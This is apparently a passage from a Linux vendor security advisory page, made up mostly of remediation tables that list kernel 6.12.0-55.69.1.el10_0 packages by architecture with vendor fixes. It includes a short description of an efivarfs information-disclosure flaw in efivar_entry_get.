| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: RT-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the efivarfs component of the Linux kernel. This vulnerability, an information disclosure issue, arises from incorrect error handling in the efivar_entry_get function. An unprivileged local attacker can exploit this by reading from efivarfs, potentially causing uninitialized kernel memory to be copied to userspace. This could allow the attacker to obtain sensitive kernel memory contents, which may aid in bypassing security mitigations.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64 | — |
Vendor Fix
fix
|
|
